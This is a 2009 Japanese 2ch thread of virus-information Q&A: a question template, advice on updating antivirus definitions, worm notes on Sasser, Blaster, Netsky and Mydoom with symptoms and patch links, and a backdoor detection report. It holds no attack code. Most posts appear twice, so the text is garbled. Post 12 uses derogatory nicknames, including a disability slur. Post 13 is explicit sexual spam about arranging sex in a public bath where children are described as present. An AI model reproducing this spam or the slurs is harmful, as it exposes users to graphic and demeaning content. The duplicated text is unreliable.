【ウィルス情報質問 総合スレッド★Part47】
【ウィルス情報質問 総合スレッド★Part46】
http://pc11.2ch.net/test/read.cgi/sec/1224511070/
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
http://pc11.2ch.net/test/read.cgi/sec/1224511070/
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
|
|
|
2 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:39:52
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:41:45
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
4 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:42:27
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
5 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:43:29
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
6 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:44:12
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
7 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:45:08
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
8 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:46:52
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part67
http://tmp7.2ch.net/test/read.cgi/download/1209106638/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト最強決定戦!
http://pc11.2ch.net/test/read.cgi/sec/1202521143/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part14
http://pc11.2ch.net/test/read.cgi/sec/1198013147/
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part67
http://tmp7.2ch.net/test/read.cgi/download/1209106638/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト最強決定戦!
http://pc11.2ch.net/test/read.cgi/sec/1202521143/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part14
http://pc11.2ch.net/test/read.cgi/sec/1198013147/
9 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:47:33
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html
関連スレッド
無償オンラインスキャンpart3【ウイルス撲滅】
http://pc11.2ch.net/test/read.cgi/sec/1223797859/
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html
関連スレッド
無償オンラインスキャンpart3【ウイルス撲滅】
http://pc11.2ch.net/test/read.cgi/sec/1223797859/
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
10 :名無しさん@お腹いっぱい。:2009/06/10(水) 20:49:10
関連スレッド
フリーのアンチウイルスソフト Part18
http://pc11.2ch.net/test/read.cgi/sec/1223134635/
セキュリティ初心者質問スレッドpart113
http://pc11.2ch.net/test/read.cgi/sec/1222443322/
一番いいセキュリティソフトはなんだ!!Part58
http://pc11.2ch.net/test/read.cgi/sec/1221538386/
☆☆トロイの木馬☆☆5台目
http://pc11.2ch.net/test/read.cgi/sec/1215569127/
【PFW】フリーファイアウォールスレPart17
http://pc11.2ch.net/test/read.cgi/sec/1215307975/
【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/
【分析】HijackThis【研究】
http://pc11.2ch.net/test/read.cgi/sec/1091346741/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc11.2ch.net/test/read.cgi/sec/1086494732/
sasser【スタコラサッサ】sasser Part2
http://pc11.2ch.net/test/read.cgi/sec/1083839516/
アンチウィルスソフトのウィルス誤検出
http://pc11.2ch.net/test/read.cgi/sec/1027753135/
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
フリーのアンチウイルスソフト Part18
http://pc11.2ch.net/test/read.cgi/sec/1223134635/
セキュリティ初心者質問スレッドpart113
http://pc11.2ch.net/test/read.cgi/sec/1222443322/
一番いいセキュリティソフトはなんだ!!Part58
http://pc11.2ch.net/test/read.cgi/sec/1221538386/
☆☆トロイの木馬☆☆5台目
http://pc11.2ch.net/test/read.cgi/sec/1215569127/
【PFW】フリーファイアウォールスレPart17
http://pc11.2ch.net/test/read.cgi/sec/1215307975/
【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/
【分析】HijackThis【研究】
http://pc11.2ch.net/test/read.cgi/sec/1091346741/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc11.2ch.net/test/read.cgi/sec/1086494732/
sasser【スタコラサッサ】sasser Part2
http://pc11.2ch.net/test/read.cgi/sec/1083839516/
アンチウィルスソフトのウィルス誤検出
http://pc11.2ch.net/test/read.cgi/sec/1027753135/
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
以上でテンプレ終わりです。
>10のリンクは確認してませんが、ご容赦を。
>10のリンクは確認してませんが、ご容赦を。
12 :名無しさん@お腹いっぱい。:2009/06/10(水) 23:39:46
*このスレにも常駐する荒らしの情報*
このスレには、ESET製品(NOD32、ESS)の宣伝と、
それ以外の製品の印象を悪くする活動を必死に行う
古参の荒らしが常駐しています。
■NOD32厨雑音を扱った保存テンプレ集。
http://pc11.2ch.net/test/read.cgi/sec/1187681559/80-168
■自作PC板の雑音過去ログ(旧名 録音)
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
■最悪板版の現スレ
http://mamono.2ch.net/test/read.cgi/tubo/1214474976/
>【軽快動作】NOD32【アンチウイルスソフト】
>http://pc8.2ch.net/test/read.cgi/sec/1112351342/
>
>482 名前:雑音 p84bef5.osaknt01.ap.so-net.ne.jp [sage] 投稿日:2005/04/25(月) 10:45:08
>連絡事項
>
>NOD32をWindows Server 2003 で使っているユーザーへ
>現在sp1をあてると通信不能となり最悪な状況下だと、リブートの繰り返しとなりますから注意してください。
>
>開発元で、現在対策バージョンを作成中とのことです。
■現在、自作PC板ではアスペル(アスペルガー症候群)、
MACオタ、あっち糞、ダプオ(脱糞男)、GF9600GT厨などの
名で知られ、AMD中傷を行っています。
このスレには、ESET製品(NOD32、ESS)の宣伝と、
それ以外の製品の印象を悪くする活動を必死に行う
古参の荒らしが常駐しています。
■NOD32厨雑音を扱った保存テンプレ集。
http://pc11.2ch.net/test/read.cgi/sec/1187681559/80-168
■自作PC板の雑音過去ログ(旧名 録音)
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
■最悪板版の現スレ
http://mamono.2ch.net/test/read.cgi/tubo/1214474976/
>【軽快動作】NOD32【アンチウイルスソフト】
>http://pc8.2ch.net/test/read.cgi/sec/1112351342/
>
>482 名前:雑音 p84bef5.osaknt01.ap.so-net.ne.jp [sage] 投稿日:2005/04/25(月) 10:45:08
>連絡事項
>
>NOD32をWindows Server 2003 で使っているユーザーへ
>現在sp1をあてると通信不能となり最悪な状況下だと、リブートの繰り返しとなりますから注意してください。
>
>開発元で、現在対策バージョンを作成中とのことです。
■現在、自作PC板ではアスペル(アスペルガー症候群)、
MACオタ、あっち糞、ダプオ(脱糞男)、GF9600GT厨などの
名で知られ、AMD中傷を行っています。
13 :名無しさん@お腹いっぱい。:2009/06/11(木) 02:26:38
いつものようにローションたっぷりつけて前立腺を刺激しオナニーをしていると急に物寂しくなったのがきっかけでした。本物ってどんな感覚なのかなぁーって
良く思うようになりました。それまで、ハリガタやバイブを使って自分でやった事はたくさんありましたが、なぜか今回オナニーをして、急に本物の味に興味津々になってしまいました。
が、僕はホモじゃないし、男に恋愛感情を持ったことなんて一回もなかったからどうしたらいいかわかんなかった。だけど、いてもたっても
いられなくなったので、とりあえず出会い系の掲示板にカキコってみた。内容は、ホモじゃなくて恋愛感情とかまったくないけどセフレみたいな関係が欲しい
といった内容を書き込んだ。すると30分くらいしてメールがきて、俺の要求をのんでくれた。ぶっちゃケその人も、男との恋愛はないらしい。
だけどアナルの締まりが好きらしくてメールをくれたらしいのだ。メールのやり取りをして場所は近くの温泉になった。そこの温泉には大浴場があって
簡単なカーテンつきの個室があるところなのでそこでやろうという話になった。当日、そこの温泉で待ち合わせをして、少しドキドキしながら待ってた。
これから生チンポに犯されると思うと少し不安だったがやはり期待もした。すると後ろから、「○○君ですか?」と声をかけられた。その人は少し織田祐二を
暗くした感じで背は170くらい、結構ゴツイ人でした。そして二人で話しながら着替え部屋に向かった。着替えている途中に相手を見てると、やっぱりゴツイ。。
スポーツかなんかやってた?と聞くと、ラグビーやってたらしい。。。どうりで・・。
して俺はというと、野球をやっていて筋肉はあるがどっちかというと普通体系。相手のチンポを見た瞬間正直ビビッた。通常時でも18〜20センチはあるだろう
デカマラだったのだ。。。このチンポが俺のアナルに・・うーん。。そして俺はというと・・・・泣通常で14センチくらい・・
まぁ勃起したら大きくなるけど、通常時のチンポを見せるのは恥ずかしかった・・そして、いざ大浴場へ。中には年寄りが7〜8人、おっさんとかおにいさんが
10人くらいで中高生とちびっこがちょろちょろいたくらい。結構人いるなぁと思いつつ、とりあえず空いてるシャワー室を探した。シャワー室があいてなかったので、
良く思うようになりました。それまで、ハリガタやバイブを使って自分でやった事はたくさんありましたが、なぜか今回オナニーをして、急に本物の味に興味津々になってしまいました。
が、僕はホモじゃないし、男に恋愛感情を持ったことなんて一回もなかったからどうしたらいいかわかんなかった。だけど、いてもたっても
いられなくなったので、とりあえず出会い系の掲示板にカキコってみた。内容は、ホモじゃなくて恋愛感情とかまったくないけどセフレみたいな関係が欲しい
といった内容を書き込んだ。すると30分くらいしてメールがきて、俺の要求をのんでくれた。ぶっちゃケその人も、男との恋愛はないらしい。
だけどアナルの締まりが好きらしくてメールをくれたらしいのだ。メールのやり取りをして場所は近くの温泉になった。そこの温泉には大浴場があって
簡単なカーテンつきの個室があるところなのでそこでやろうという話になった。当日、そこの温泉で待ち合わせをして、少しドキドキしながら待ってた。
これから生チンポに犯されると思うと少し不安だったがやはり期待もした。すると後ろから、「○○君ですか?」と声をかけられた。その人は少し織田祐二を
暗くした感じで背は170くらい、結構ゴツイ人でした。そして二人で話しながら着替え部屋に向かった。着替えている途中に相手を見てると、やっぱりゴツイ。。
スポーツかなんかやってた?と聞くと、ラグビーやってたらしい。。。どうりで・・。
して俺はというと、野球をやっていて筋肉はあるがどっちかというと普通体系。相手のチンポを見た瞬間正直ビビッた。通常時でも18〜20センチはあるだろう
デカマラだったのだ。。。このチンポが俺のアナルに・・うーん。。そして俺はというと・・・・泣通常で14センチくらい・・
まぁ勃起したら大きくなるけど、通常時のチンポを見せるのは恥ずかしかった・・そして、いざ大浴場へ。中には年寄りが7〜8人、おっさんとかおにいさんが
10人くらいで中高生とちびっこがちょろちょろいたくらい。結構人いるなぁと思いつつ、とりあえず空いてるシャワー室を探した。シャワー室があいてなかったので、
14 :名無しさん@お腹いっぱい。:2009/06/11(木) 04:32:03
backDoor.Win32.MoSucker.30.cd
が検出されたました
が検出されたました
